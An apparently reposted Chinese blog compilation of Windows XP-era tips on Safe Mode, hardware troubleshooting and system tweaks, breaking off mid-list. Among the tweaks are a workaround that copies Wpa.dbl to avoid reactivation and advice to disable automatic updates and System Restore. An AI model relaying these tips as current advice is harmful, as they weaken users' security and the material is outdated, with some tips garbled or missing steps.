志刚 的个人资料曾经沧海难为水照片日志列表更多 ![]() | 帮助 |
|
|
7月29日 用好你的安全模式不管你在电脑方面是新手还是老手,只要你用Windows,就肯定会经常听到一个词语:安全模式。初学者往往对这个概念往往理解含糊,什么是安全模式?难道平时系统都是“不安全模式”?安全模式能干什么? 什么是安全模式
我们都知道,对于现在的Windows 2000/XP/2003操作系统,系统本身的稳定性已经不是问题,而大量的驱动和应用程序才是危害系统稳定性和可靠性的罪魁祸首。可能系统本来工作非常正常,但是某天升级了一个有Bug的显卡驱动,或者安装了一个新版本的杀毒软件之后系统就无法正常启动了。为了解决这类会影响到Windows正常运行,但又并非Windows自身问题的故障,微软为我们准备了安全模式。 通过“安全模式”的方式登录到系统中,看到的桌面与通常看到的很不一样,就像在Windows 98系统中刚安装好系统而没有安装任何驱动程序时的模式,事实就是这样,当Windows在安全模式下运行的时候,系统将只载入能够启动系统的最基本的服务和驱动程序,这样操作系统将会使用最少的驱动和服务运行,并使用通用的显卡驱动程序,工作在640× 480的分辨率下,同时仅能支持键盘、鼠标、显示器、本地硬盘,并开启默认的系统服务。在安全模式下,Windows并不载入音频设备和其他非必要外设的驱动,而且Windows还会忽略所有随系统启动自动运行的程序。 提示: Windows XP/2003中的通用显卡驱动程序将可以在安全模式下显示24位色深和640 x 480的分辨率,然而这些设置是无法修改的。 怎样进入安全模式 启动过程中按下F8键是最传统也是最常用的方法:当我们打开电脑电源,硬件完成自检之后,立刻按下键盘上的F8键,你将看到如图1所示的界面。这里列出了很多高级启动选项。在此安全模式又分为几种,一般情况下我们选择进入普通的安全模式即可。除了这种最常用的方法外,在计算机启动时按住Ctrl键不放,也可以以“安全模式”启动系统。
提示:至于其他几个高级启动选项的详细作用请参考微软知识库文章,KB 315222:http://support.microsoft.com/kb/315222/ZH-CN/ 。 另外,当你在Windows的正常模式下时,单击“开始/运行”,输入“msconfig”,然后在打开的窗口中选择“一般”选项卡,再勾选“论断启动-仅加载基本设备驱动程序和服务”项(如图2),最后单击“应用/确定”并重新启动,系统即会自动进入“安全模式”。 Windows安全模式" style="BORDER-RIGHT: black 1px solid; BORDER-TOP: black 1px solid; BORDER-LEFT: black 1px solid; BORDER-BOTTOM: black 1px solid" alt="小菜必学 用好你的Windows安全模式" src="/Article/UploadPic/2006-6/200661341857198.jpg" align=no>
利用安全模式解决实际问题 现在你也许大概知道了安全模式的意义,但究竟如何使用它呢?下面就让我们用实例来告诉你! 修复系统故障 有的时候,Windows运行起来不太稳定或者无法正常启动,这时就可以尝试使用“安全模式”来解决问题。试着重新启动计算机并切换到“安全模式”启动,成功以“安全模式”启动系统后,再重新按正常模式启动计算机,这样,系统会在“安全模式”下自动修复可能出错的注册表和某些系统文件,一些不太严重的系统错误就会被修复。 解决驱动或软件导致的崩溃 这个问题可能很多人都会遇到,这种情况下,唯一的解决办法就是卸载新驱动,恢复老版本的驱动,可问题是Windows都无法启动了,怎样卸载和恢复呢?如果你安装的驱动是用于一些非重要设备(例如网卡、显卡、声卡等)的,那么可以试试看进入安全模式进行恢复。 前面已经说过,在安全模式下,系统将只加载最基本的驱动程序,因此只要系统还能进入安全模式,我们就可以直接卸载驱动,或者Windows XP/2003用户可以利用“返回驱动程序”功能返回上一次的正确驱动(如图3)。
纠正显示分辨率 如果我们在显示属性中设置了显示器无法接受的分辨率,例如给17寸的CRT显示器设置了1600×1200的分辨率,因为无法正查显示,我们也就无法将分辨率改为正常的设置。确实Windows有一种保护机制,当你设置了过高而显示器无法显示的分辨率的时候,只要等待30秒就会自动恢复到之前的分辨率,不过有时候因为各种原因,该功能可能会无法生效。 这时候就可以利用安全模式了,因为在安全模式下,系统都将显示640×480分辨率的桌面。因此我们大可以放心将系统启动到安全模式下,在显示属性中设置正确的分辨率,并重启动系统到正常模式下。 删除顽固软件或病毒木马 在常规模式下,有些病毒和木马(甚至正常软件)可能无法正确删除,因为他们可能和某些自动加载的软件有有联系。这时候你就可以试试安全模式。因为在安全模式下,大部分这类程序都不会被操作系统加载,因此我们可以放心用杀毒/木马软件删除病毒和木马,或者按照需要卸载一些正常模式下无法卸载的软件。 虽然现在的恶意软件和病毒越来越狡猾,有些可能在安全模式下也无法清除,不过在安全模式下删除软件软件或者病毒木马是初学者必须掌握的技巧。 磁盘碎片整理 系统用久了,在硬盘中便会出现很多碎片,碎片多了会影响系统的性能,也会浪费宝贵的硬盘资源。因此,建议大家定时给硬盘进行碎片整理,而在碎片整理的过程中,最好不要运行其它程序的,而一般在正常启动Windows时,系统会加载一些自动启动的程序,而这些程序又不易关闭,常常会对碎片整理程序造成干扰。这种情况下,我们就应该重新启动计算机,进入安全模式,安全模式是不会启动任何自动启动程序的,可以保证磁盘碎片整理的顺利进行。 想必通过这篇文章,大家对安全模式以及它的典型应用已经有基本的了解。不过安全模式的功用还有很多,希望初学者在碰到具体电脑问题的时候能够想到“安全模式”,说不定很多问题都会迎刃而解。 学习判断电脑硬件故障在电脑市场里最可怜的人要数那些将带有故障的电脑搬来搬去的人了。组装机与品牌机比起来虽然有她的长处,但没有良好的售后服务是她的致命短处。 大部分电脑故障是软件故障,因此在未确定是硬件故障前没必要将整台机器搬来搬去。即使是硬件故障,也没必要将整台机器搬去,只须将出故障的部件拿去即可。因此我们有必要了解硬件故障的诊断和测试方法,以后电脑出了故障不用将整台机器都搬去了(当然最好是不出故障!)。 故障及对策 如果想对电脑故障做全面的分析,那恐怕要写一本书,且那也并非易事。关于软件的故障在各类报刊上介绍过很多,因此这里只介绍硬件故障的症状,原因以及解决方法。 一、电脑启动过程 Ⅰ、首先来了解一下电脑的启动过程 1、贮存在ROM(只读存储器)中的Bootstrap Loader程序和自诊断程序移动到RAM(随机存储器)中。 2、随着Bootstrap Loader的运行,储存在辅助记忆装置中的操作系统将系统文件送到RAM中。 3、执行系统文件Io.sys和Msdos.sys。这时画面上出现“Starting Windowsn98……”的信息。 4、若有Config.sys则执行它。 5、执行系统文件的Command.com文件。 6、若有Autoexec.bat则执行它。 7、读取Windows的初始化文件“System.ini”和“Win.ini”,再读取注册表文件。 8、启动结束,出现初始画面,运行操作系统。 这个过程中,在主板的ROM BIOS中监测硬件是否异常,包括硬件故障,接线情况,各类卡的安装等。如果发生错误,画面上什么也不出现,启动停止。 这种情况下很可能是硬件故障。 Ⅱ、系统启动顺序 1、PC电源的ON——显示器,键盘,机箱上的灯闪烁。 2、检测显卡——画面上出现短暂的显卡信息。 3、检测内存——随着嘟嘟的声音画面上出现内存的容量信息。 4、执行BIOS——画面上出现简略的BIOS信息。 5、检测其他设备——出现其他设备的信息(CPU,HDD,MEM...)。 6、执行OS(操作系统)的初始化文件-Starting Windows 98等。 Ⅲ、在启动时主板中发出声音,通过这个声音可以判断是何种错误 根据主板形式的不同,声音的表示也有所不同. AMI BIOS: 1短:内存刷新失败 2短:内存校验错误 3短:基本内存错误 4短:系统时钟错误 5短:CPU错误 6短:键盘错误 7短:实模式错误 8短:内存显示错误 9短:ROM BIOS校验错误 1长3短:内存错误 AWARD BIOS: 1短:启动正常 2短:非致命错误 1长1短:显示错误 1长2短:键盘错误 其他BIOS可查《BIOS错误提示音》,这里不再详细介绍。 二、易混淆的软件故障 必须明确地区分硬件故障和软件故障,否则费了很大的力气将电脑搬到电脑市场,店主告诉你是软件故障时你会是什么心情呢。特别是启动故障也有可能是软件故障造成的。下面我们就来看一看由软件故障造成的启动异常。 Ⅰ、CMOS Setup的错误 如果在CMOS Setup中的硬盘设置不正确的话,因为电脑无法识别硬盘,因此导致不能用硬盘中的操作系统(Windows)启动。出现画面但无法启动时应该检查CMOS Setup的内容。若要正确识别硬盘,可以使用CMOS Setup中的“IDE HDD Auto Detection”选项。 Ⅱ、系统文件的错误 Windows启动时需要Command.com, Io.sys, Msdos.sys, Drvspace.bin 四个文件。如果这些文件遭破坏,即使识别了硬盘也不能启动。这时可以使用“Sys.com”文件恢复这些文件。用启动盘启动后,键入“Sys c:”即可。 Ⅲ、初始化文件的错误 Windows在启动时要读取“Autoexec.bat”,“Config.sys”,“System.ini”,“Win.ini”,“User.dat”,“System.dat”六个文件。但在读取时若其中有错误的信息将发生启动失败。而这些文件是很难恢复的,因此要使用Windows重新设置等方法。但这不是硬件故障,用不着把电脑抱到电脑市场去。 Ⅳ、Windows的错误Windows初始画面出现后的故障大部分是软件的故障。程序间的冲突或驱动程序的问题等等。这样的问题可以用翻阅书籍等方法自行解决。 三、不是故障的硬件故障 虽然不是故障,但时常发生用户组装不正确或插口松等现象。这时可以自己打开电脑检查接线,插口等的错误。在新购硬盘,CD-ROM等EIDE设备时要注意将连接在中间的装置设置为“SlaveE”,将连接在边上的装置设置为“Master”,如果设置得不正确,有可能无法启动或使用相应装置时发生错误。 四、硬件故障的检测方法 下面我们来看一看硬件故障的基本测试方法。显示器没有任何图像出现时可以使用下面的方法测试出故障的部件。 一、首先准备一个工作台。 二、将主板从机箱拔出,再把主板上的所有部件拔出,只留下CPU和RAM.然后把主板放到工作台上。 三、将稳压电源连接在主板上。 四、将显卡插入AGP插槽。当然如果是PCI显卡则插入PCI插槽中。插入时要注意将显卡镀金的部分完全地插入插槽中。 五、连接显示器电源插口后将显卡与显示器连接起来。 六、打开显示器电源,再接通机箱电源开关。然后用金属棒接触主板的电源开关。 主板的电源开关是与机箱电源开关连接的部分,一般标记为“PWR SW”或“POWER SE”。 七、如果画面上出现BIOS的版本信息,画面没有异常的话,说明CPU,主板,RAM,显卡,电源都正常.通常,经常易出现故障的部件是“显卡”,“主板”,“硬盘”这个顺序。 八、然后连接硬盘和软区进行检测。接着连接CD-ROM检测,然后是声卡。Modem等一个一个的连接进行检测。如果不出现画面就说明后连接的那个部件有故障或是有兼容性问题。只须处理那个出故障的部件即可。 九、机箱的问题 有时将主板安装到机箱时发生问题,导致启动失败。因此如果在上面的部件检查中没有任何问题的话,可以将主板安装到机箱上测试。如果在测试中没有任何的错误,则说明是CMOS Setup错误,驱动程序等的软件问题。 检测电脑故障的简单方法 如果排除了“假故障”,那么就是真的有故障存在了!若再检测一下各配件的外观,包括打开机箱看到主机内部的各部件表面都没有被高电压击毁的迹象,或者明显的伤痕,若有的话,故障部件就清楚了。若都没有,可先试下面的处理方法。 1.清除尘埃 飘浮在空气中的尘埃是计算机一大杀手,使用一段后就可能因主板等关键部件积尘太多而出现故障,即便是在专用机房中也会如此。所以,对于使用了较长时间的计算机,应首先进行清洁,用毛刷轻轻刷去主板、外设上的灰尘。如果灰尘已清扫掉,或无灰尘,故障仍然存在,就表明硬件存在别的问题。 另外,由于板卡上一些插卡或芯片采用插脚形式,震动、灰尘等原因常会造成引脚氧化,接触不良。可用橡皮擦擦去表面氧化层,重新插接好后开机检查故障是否排除。 随便说一句,键盘使用日久往往会出现漏电、按键卡死等故障,此故障应及时处理,否则在输入文件时将会键入一些错误的字符。处理时应把键盘用一个托架托起来,按键向下,打开键盘的后盖,用酒精清洗线路板及按键的触点,并把卡死的按键下面的弹片适当撬起,使之恢复原有的弹性。 注意:软盘使用中,脏污或被划伤的软盘插入软驱时会划伤读写头,损坏软驱。清洗磁头时一定要十分谨慎,长时间不用的软驱,可能在磁头上会有锈蚀,此时不可使用清洗盘,具体做法是打开机箱将清洗剂滴在磁头上,浸泡半小时后,用脂棉小心地擦拭干净。如果盲目地使用清洗盘势必导致软驱读写头的损伤,使软驱报废。 2.看、听、闻、摸 “听”即监听电源风扇、软/硬盘电机或寻道机构、显示器变压器等设备的工作声音是否正常。另外,系统发生短路故障时常常伴随着异常声响,监听可以及时发现一些事故隐患和在事故发生前即时采取措施。 选择时诊断程序时要严格、全面、有针对性,能够让某些关键部位出现有规律的信号,能够对偶发故障进行反复测试,并能显示出错记录。 环境检查法 电脑的140个技巧1. 重装Windows XP不需再激活 如果你需要重装Windows XP,通常必须重新激活。事实上只要在第一次激活时,备份好Windows\System32目录中的Wpa.dbl文件,就不用再进行激活的工作了。在重装Windows XP后,只需要复制该文件到上面的目录即可。 2. 如何知道自己的Windows XP是否已激活 3. 关闭zip文件夹功能 你是不是觉得Windows XP中的zip文件夹功能太慢,功能也不吸引人?如果是这样,你可以打开开始→运行,在弹出的对话框中输入:regsvr32 /u zipfldr.dll,回车后即可关闭ZIP文件夹功能。 4.让Windows XP也能刻ISO文件 Windows XP没有提供直接刻录ISO文件的功能,不过你可以下载一个第三方插件来为系统增加这个功能。 5. 登陆界面背景变变色 打开注册表编辑器,找到[HKEY-USERS\.DEFAULT\Control Panel\Colors],将Background的值改为“0 0 0”(不带引号),这样登录背景就成了黑色。 6.完全卸载XP 有些朋友在安装Windows XP后发现自己并不喜欢这个操作系统,这时你可以用Windows 98安装光盘启动到DOS状态,然后键入: 这样可以删除所有XP的文件,并可重新安装Windows 98/Me。 7. 系统救命有稻草 8. 恢复硬件以前的驱动程序 在安装了新的硬件驱动程序后发现系统不稳定或硬件无法工作时,只需在“设备管理器”中选择“驱动程序恢复”按钮,即可恢复到先前正常的系统状态。但不能恢复打印机的驱动程序。 9. 自动登陆 单击开始→运行,输入“rundll32netplwiz.dll,UsersRunDll”(不带引号),然后在User Accounts中取消“Users must enter a user name and password to use this computer”,单击“OK”,接着在弹出的对话框中输入你想自己登陆的用户名和密码即可。 10.快速关机或重启的快捷键(可定时) 在桌面点击鼠标右键,选择新建(快捷方式,在弹出的向导中输入位置为:C:\WINDOWS\system32\shutdown.exe -s -t 10(其中的-s可以改为-r,也就是重新启动,而-t 10表示延迟10秒,你可以根据自己的需要更改这个数字)。制作完这个快捷键后,按照上面的方法为它指定一个图标。这个快速关机或重启的技巧会显示一个比较漂亮的对话框提示关机(重启),而且你可以在后面加上“-c 我要关机啦!”,这样这句话会显示在对话框中,当然文字你可以随意写,但要注意不能超过127个字符。 11.关机、重启只要1秒钟 如果你想让Windows XP瞬间关机,那么可以按下CTRL+ALT+DEL,接着在弹出的任务管理器中点击“关机”→“关机”,与此同时按住CTRL,不到1秒钟你会发现系统已经关闭啦,简直就在眨眼之间。同样道理,如果在“关机”菜单中选择“重启”,即可快速重启。
13. 批量文件重命名 Windows XP提供了批量重命名文件的功能,在资源管理器中选择几个文件,接着按F2键,然后重命名这些文件中的一个,这样所有被选择的文件将会被重命名为新的文件名,在末尾处加上递增的数字)。 14. 快速锁定计算机 在桌面上单击鼠标右键,在随后出现的快捷菜单上选择新建“快捷方式”,接着系统便会启动创建快捷方式向导,在文本框中输“rundll32.exe user32.dll,LockWorkStation”,点击“下一步”,在弹出的窗口中输入快捷方式的名称,点击“完成”即可。当然最简单的锁定计算机的方法是直接按WinKey + L。 15. 让双键鼠标具有滚页功能 在控制面板中双击“鼠标”项,在弹出的“鼠标属性”对话框中选择“单击锁定” 栏中的“启动单击锁定”项。再点击“设置”按钮,在弹出的“单击锁定的设置”对话框中将鼠标设为最短,点击“确定”保存。打开一个网页,点击网页的卷轴,在离网页卷轴不远处上下移动鼠标,即可实现此功能。再次点击网页的卷轴即可关闭此功能。 16. 让Windows XP读英文字母 找到“辅助工具”组里的“讲述人”程序,点击“声音”按钮,进入“声音设置”界面进行一番设置然后保存即可。当你把鼠标指向带有英文字母的对话框、菜单以及按钮时,会听见一个男声读着英文。
很多人安装了Windows XP后的第一感觉就是Windows变得漂亮极了。只是可惜美丽的代价要耗掉我们本就不富裕的内存和显存。要想恢复到和经典Windows类似的界面和使用习惯,请在桌面上单击鼠标右键,选择“属性”命令即可进入“显示属性”的设置窗口。这里共有“主题”、“桌面”、“屏幕保护程序”、“外观”和“设置”五个选项卡。在当前选项卡的标签上会有一条黄色的亮色突出显示,默认是“主题”选项卡,这里我们只要在“主题”的下拉选单里选择“Windows经典”,立即就可以在预览窗口看到显示效果,同时,外观选项卡的内容也会随之进行更改。 18.恢复“开始”菜单 Windows XP新的“开始”菜单还是挺方便的,对系统资源的影响也不大。如果你喜欢过去的经典菜单的话,用鼠标右键单击任务栏空白处,选择“属性”菜单,进入“任务栏和开始菜单属性”的设置窗口,选择“[开始]菜单”选项卡,选择“经典[开始]菜单”即可恢复到从前的模样了。 19.优化视觉效果 Windows XP的操用界面的确是很好看,好看的背后是以消耗大量内存作为代价的,相对于速度和美观而言,我们还是宁愿选择前者,右键单击“我的电脑”,点击“属性/高级”,在“性能”一栏中,点击“设置/视觉效果”,在这里可以看到外观的所有设置,可以手工去掉一些不需要的功能。在这里把所有特殊的外观设置诸如淡入淡出、平滑滚动、滑动打开等所有视觉效果都关闭掉,我们就可以省下“一大笔”内存。 20.禁用多余的服务组件 Windows XP和Windows 2000一样可以作为诸如Http服务器、邮件服务器、FTP服务器,所以每当Windows XP启动时,随之也启动了许多服务,有很多服务对于我们这些普通用户来说是完全没用的,所以关掉它们是一个很好的选择。操作的方法是:右键单击“我的电脑”,依次选择“管理/服务和应用程序/服务”,将不需要的服务组件禁用。 21.减少启动时加载项目 许多应用程序在安装时都会自作主张添加至系统启动组,每次启动系统都会自动运行,这不仅延长了启动时间,而且启动完成后系统资源已经被吃掉不少!我们可以减少系统启动时加载的程序,方法是:选择“开始”菜单的“运行”,键入“msconfig”启动“系统配置实用程序”,进入“启动”标签,在此窗口列出了系统启动时加载的项目及来源,仔细查看你是否需要它自动加载,否则清除项目前的复选框,加载的项目愈少,启动的速度自然愈快。此项需要重新启动方能生效。 22.关闭系统还原功能 “系统还原”功能是Windows系列操作系统的一个重要特色,当Windows运行出现问题后,还原操作系统。“系统还原”虽然对经常犯错误的人有用,但是它会让你的硬盘处于高度繁忙的状态,你会发现你的硬盘总是忙个不停,因为Windows XP要记录操作,以便曰后还原。如果你对自己有信心,那么就不要使用它,因为它可占不少内存。关闭系统还原功能方法是:单击“开始/所有程序/附件/系统工具/系统还原”,在系统还原界面,单击“系统还原设置”进入“系统还原设置”窗口,清空“在所有驱动器上关闭系统还原”复选框,这样Windows XP就会删除备份的系统还原点,从而释放它占用的磁盘空间。一般来说,为了兼顾系统性能和系统安全,笔者建议打开Windows XP所在盘符的系统还原功能。 23.关闭自动更新 “自动更新”是Windows XP为了方便用户升级系统而推出的一种新功能,这种功能可以在微软推出系统升级补丁或系统安全补丁的时候,自动提醒用户升级自己的系统,不过这种功能有一个要求,就是用户必须时时在线,但是对于我们这些缺铁少银的“穷人”来说,这个要求未免苛刻,所以我们把“自动升级”功能关闭掉,改为“手动升级”。关闭自动更新具体操作为:右键单击“我的电脑/属性/自动更新”,在“通知设置”一栏选择“关闭自动更新。我将手动更新计算机”一项。 24.关闭远程桌面 这个功能的一个特点就是可以让别人在另一台机器上访问你的桌面。在局域网中,这个功能很有用。比如你有问题了可以向同事求助,他可以不用到你的跟前,直接通过“远程桌面”来访问你的机器帮你解决问题。但是对于我们只有一台计算机的 普通用户来说这个功能就显得多余了,所以我们把它关掉,不让它在那儿白白浪费内存。具体操作为:右键单击“我的电脑”,选择“属性/远程”,把“远程桌面”里的“允许用户远程连接到这台计算机”勾去掉。 25.禁用消休眠功能 Windows XP的休眠可以把内存中当前的系统状态完全保存到硬盘,当你下次开机的时候,系统就不需要经过加载、系统初始化等过程,而直接转到你上次休眠时的状态,因此启动非常快。但它会占用大量的硬盘空间(和你的内存大小一样),可以到“控制面板/电源选项/休眠”中将其关闭,以释放出硬盘空间,待到要需要使用时再打开即可。方法是:单击“开始/控制面板/电源管理/休眠”,将“启用休眠”前的勾去掉。 26.关闭“自动发送错误报告”功能 大家在Window XP 中肯定有这样的经历,一旦一个程序异常终止,系统就会自动跳出一个对话框问你是否将错误发送给微软,这就是XP中的“自动发送错误”功能,它可以将错误信息发送到微软的网站。虽然微软一再信誓旦旦地表示,可以提供强大的安全保障,不会泄露个人隐私,但是发送给微软的信息中有可能包含你正在浏览或编辑的文档信息,也许这正包含了个人隐私或是公司机密,因此如果你想保障自己应有的权利,我们应该义无反顾的把这项功能关掉。方法是:单击“开始/控制面板/系统/高级”,单击“错误报告”按钮,然后选中“禁用错误报告”,下面的“但在发生严重错误时通知我”可以选中。 关闭“Internet时间同步”功能 “Internet时间同步”就是使你的计算机时钟每周和Internet时间服务器进行一次同步,这样你的系统时间就会是精确的,不过这个功能对我们来说用处不大,而且还可能引起死机的问题。一般来说,只要在安装完Windows XP以后同步一次时间就可以了。所以我们要把它关掉。具体操作是:依次单击“开始/控制面板/曰期、时间、语言和区域选项”,然后单击“曰期和时间/Internet时间”。
对于虚拟内存文件,Windows XP为了安全默认值总是设的很大,浪费了不少的硬盘空间,其实我们完全可以将它的值设小一点。方法是:进入“控制面板/系统/高级/性能/设置/高级/虚拟内存/更改”,来到虚拟内存设置窗口,首先确定你的页面文件在哪个驱动器盘符,然后将别的盘符驱动器的页面文件全部禁用。建议你把它是设置到其他分区上,而不是默认的系统所在的分区,这样可以提高页面文件的读写速度,有利于系统的快速运行。根据微软的建议,页面文件应设为内存容量的1.5倍,但如果你的内存比较大,那它占用的空间也是很可观的,所以,建议如果内存容量在256MB以下,就设置为1.5倍,最大值和最小值一样,如果在512MB以上,设置为内存容量的一半完全可行。 28.删除多余文档 Windows XP中有许多文件平时我们很少用到,放在硬盘中,白白浪费空间,降低系统性能。我们完全可以把这些用不到的文件删除,需要删除的文件有: 29.删除WindowsXP中隐含的组件 Windows XP在正常安装之后,会自动安装许多组件,这些组件有许多是平时用不到的,安装在系统中会占用很多空间,降低系统性能,我们可以用下述方法删除不用的组件。用记事本修改C:\Windows\Inf\目录下的Sysoc.inf文件,用查找/替换功能,在查找框中输入“,hide”(一个英文逗号紧跟hide),将“替换为”框设为空。并选全部替换,这样,就把所有的“,hide”都去掉了,存盘退出,再单击“开始/控制面板/添加或删除程序”,就可以看到许多平时见不到的组件,选择不需要程序进行删除即可。 30.清理垃圾文件 Windows XP在正常的使用过程中会产生扩展名为TMP、BAK、OLD之类的垃圾文件,你可以用Windows的搜索功能,查出这些文件,然后把它们删除。另外Windows XP默认会在系统失败时记录错误事件,并写入调试信息,这些文件信息我们完全可以弃之不用。方法是单击“开始/控制面板/系统/高级/启动和故障恢复”,清空“将事件写入曰志文件”,在“写入调试信息”下拉框里选“无”即可。 31.禁止MSN随Windows启动 每次启动Windows时,Messenger总是自动运行,即使你不想启动它,可是它也自动运行,非常烦人,我们能不能禁止它,不让它随Windows启动呢?回答是可以的。 32.优化带宽 Windows XP专业版新增了QoSRRP(这是Quality of Service Resource Reservation Protocol的缩写,意为服务质量资源预留协议)。一般来说,试图通过可用带宽访问信息的时候,应用程序要么通过QoS应用程序接口,要么通过另一个称为TCI的应用程序接口。在网络通讯上,为了商业方面的安全性保留了一定的频宽给了管理者,这对于QoS应用程序来说无疑是件好事,但是一般使用者便不需要此功能,无形中就有部分(默认为20%)带宽白白浪费了,因此我在此提供取消此功能的方法。选择“开始”菜单,点击“注销”,进到登录的主画面,在登录的主画面中按下Ctrl+Alt+Del两次出现了登录窗口,在使用者名称中输入Administrator(注:要区分大小),密码栏中填入自设密码(若没有设定密码者空白即可)按确定进入Windows,单击“开始/运行”输入gpedit.msc进入到“组策略”窗口,在左边窗口中选取“计算机配置/管理模板/网络/QoS数据包调度程序”,在右边的窗口中双击“限制可保留的带宽”,选择“已启用”并将“带宽限制(%)”设为0,单击“应用”,然后“确定”,重新启动即可。 33.删除多余字体 Windows XP中安装的字体越多,就会占用更多的内存的系统资源,减慢系统的运行速度,因此,对于不常用的字体,我们最好把它从系统中删除。字体文件存放在C:\Windows\font目录下,你完全可以根据需要选择一些字体,对于更多不用的字体,一删了之。 34.更改IE临时文件夹 上网时产生的大量临时文件都存放在IE临时文件夹中,默认情况下,临时文件夹是在系统分区上,大量的临时文件会影响硬盘读写系统文件的性能。你可以更改临时文件的位置来避免出现这种情况。方法是单击“开始/控制面板/Internet选项”,在“常规”选项卡中 单击“设置”按钮,在打开的窗口中单击“移动文件夹”按钮,指定一个非系统分区上的文件夹,单击“确定”后,临时文件就会移到指定的文件夹上。 35.加快“网上邻居”共享的速度 不知道各位使用者用Windows XP开“网上邻居”里面的共享资源时,有没有发现所花的时间相当的长,这是因为它会检查其它计算机中的设定工作,有时甚至就在那边停了将近一分钟,相当讨厌,大家可以通过下面的方法将其检查的步骤取消:选择“开始/运行”,输入regedit,在弹出注册表编辑器中寻找 [HKEY_LOCAL_MACHINE/Software/Microsoft/Windows/CurrentVersion/Explorer/RemoteComputer/NameSpace],按鼠标右将在此位置的{D6277990-4C6A-11CF-8D87-00AA0060F5BF}删除之即可。 当Windows XP使用一段时间后,安装目录下的预读文件夹(C:\Windows\prefetch)里的文件会变的很大,里面会有死链接文件,这会减慢系统时间,建议你定期删除这些文件。 37.设置预读以提高速度 Windows XP使用预读设置这一新技术,以提高系统速度。如果你的电脑配置不错,拥有PIII 800, 512M内存以上,你可以进行以下修改:单击“开始/运行”,输入“regedit”,打开注册表,找到[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\PrefetchParameters\EnablePrefetcher],设置数值0,1,2,3(0-Disable,1-预读应用程序,2-启动预读,3-前两者皆预读),推荐使用“3”,这样可以减少启动时间。 38.取消不需要的网络服务组件 单击“开始/控制面板/网络连接/本地连接”打开本地连接状态窗口,单击“属性”按钮,打开属性对话框,单击“高级”选项卡,选中“通过限制或阻止来自Internet的对此计算机的访问来保护我的计算机和网络”选项,然后单击“设置”按钮,就可以看到所有已经安装的、Internet用户可以访问的、运行于你的网络上服务,除非你想架设FTP或SMTP服务器,否则不妨全部取消这些项目的选定状态。 39.启用DMA传输模式 所谓DMA,即直接存储器存储模式,指计算机周边设备(主要指硬盘)可直接与内存交换数据,这样可加快硬盘读写速度,提高速据传输速率。由于某些原因,Windows XP有时会在IDE通道上使用PIO并行输入输出传输模式,而不是DMA模式。如果有这种情况,用户可以手动把IDE通道改为DMA模式,这样可以减少该设备占用的CPU周期。方法是:右键点击“我的电脑”,选“属性”,点选“硬件”选项卡,单击“设备管理器”按钮,打开“设备管理器”,然后点击展开“IDE ATA/ATAPI 控制器”分支,其中“IDE控制器”有两项“主要IDE通道”及“次要IDE通”,分别选中,依次进入“属性/高级设置”,该对话框会列出目前IDE接口所连接设备的传输模式,检查“传输模式”下拉菜单,把它们全部设“DMA(若可用)”,点击“确定”。 40.加快菜单显示速度 选择“开始/运行”,输入regedit,弹出注册表编辑,寻找[HKEY_CURRENT_USER\ControlPanel\Desktop],在右边的窗口中选择MenuShowDelay,按鼠标右键,选择“修改”,将其数值资料改为100或更小(默认值为:400),建议不要使用0,因为如此一来只要鼠标一不小心触碰到“所有程序”,整条菜单就会跑出来,那这乱了套。 41.加快关机速度 Windows XP的开机速度的确比以前版本的操作系统快了很多,但关机速度却慢了不少。如果你在意关机速度的快慢,可以修改几个注册表键值,就可以大大减少Windows关闭所用的时间。首先打开注册表编辑器,找到HKEY_CURRENT_USER\Control Panel\Desktop\,里面有个名为HungAppTimeout的键,它的默认值是5000(如果不是,把它改为5000)。接下来,还有个WaitToKillAppTimeout键,把它的值改为4000(默认值是2000)。最后,找到注册表如下位置:HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\。同样地,把其中的WaitToKillServiceTimeout键值改为4000。另外,把“控制面板/管理工具/服务”中的NVidia Driver Help服务设为手动,也可以加快Windows关闭时间。 42.关闭计算机时自动结束任务 在关机的时候,有时会弹出讨厌的对话框,提醒某个程序仍在运行,是否结束任务。其实完全可以通过一点点修改让Windows自动结束这些仍在运行的程序。在注册表中打开HKEY_CURRENT_USER\Control Panel\Desktop 目录,把里面的AugoEndTasks键值改为1。 43.关闭华生医生Dr.Watson 单击“开始/运行”,输入“drwtsn32”命令,或者“开始/所有程序/附件/系统工具/系统信息/工具/Dr Watson”,调出系统里的华生医生Dr.Watson ,只保留“转储全部线程上下文”选项,否则一旦程序出错,硬盘会读很久,并占用大量空间。如以前有此情况,请查找user.dmp文件,删除后可节省几十MB空间。 44.减少磁盘扫描等待时间 WindowsXP虽然号称稳定,但是并不是永不死机,偶尔也会给你个蓝脸,非法操作后系统会自动扫描,出现大段大段的E文,告诉你刚才系统非正常结束,现在需要检查一下是否出错,可是还要等待一段时间才开始,所以我们可以在dos下,键入“chkntfs/t:0”,表示等待时间为0秒。 45.删除多余的帐户 如果你的电脑只有你一个人使用,最好只建自己的一个帐户,因为你每建一个帐户,就会在Windows XP的安装目录下的\documents and settings\下面多一个以你所建帐户为名的文件夹,里面存放着这个帐户的一些资料,有收藏夹、文档、历史记录,系统设置信息等内容,天长曰久它占用的空间也是不可小觑的,解决方法就是到“开始/控制面板/用户帐户”里依自己情况删除多余的帐户即可。 46.让系统自动关闭停止响应的程序 单击“开始/运行”,输入regedit,弹出注册表编辑器,寻找[HKEY_CURRENT_USER\ControlPanel\Desktop],在右边的窗口中选择AutoEndTasks,按鼠标右键,选择“修改”,将其数值资料改为1(默认值为:0)。 47.IE网络浏览器加速技巧 Windows XP自带Internet Explorer6,有个小技巧,修改之后启动得飞快(在我的机子上,简直是瞬间启动)。具体做法是:右键点击Internet Explorer快捷图标(如任务栏上的快捷启动栏中那个IE图标),打开图标属性之后在“目标”后面加上“-nohome”参数即可。 48.加密文件和文件夹 在任何需要加密的文件和文件夹上右键单击鼠标,选择“属性”命令,单击“常规”选项卡,然后依次选择“高级加密内容以便保护数据”后确定就可以了。需要说明是 :Windows XP的加密操作只针对NTFS格式的磁盘分区,它对传统的FAT16和FAT32格式的分区不提供加密支持,如果你想使用加密操作,就需要把磁盘转换为NTFS格式。 49.自定义文件夹图片 在Windows 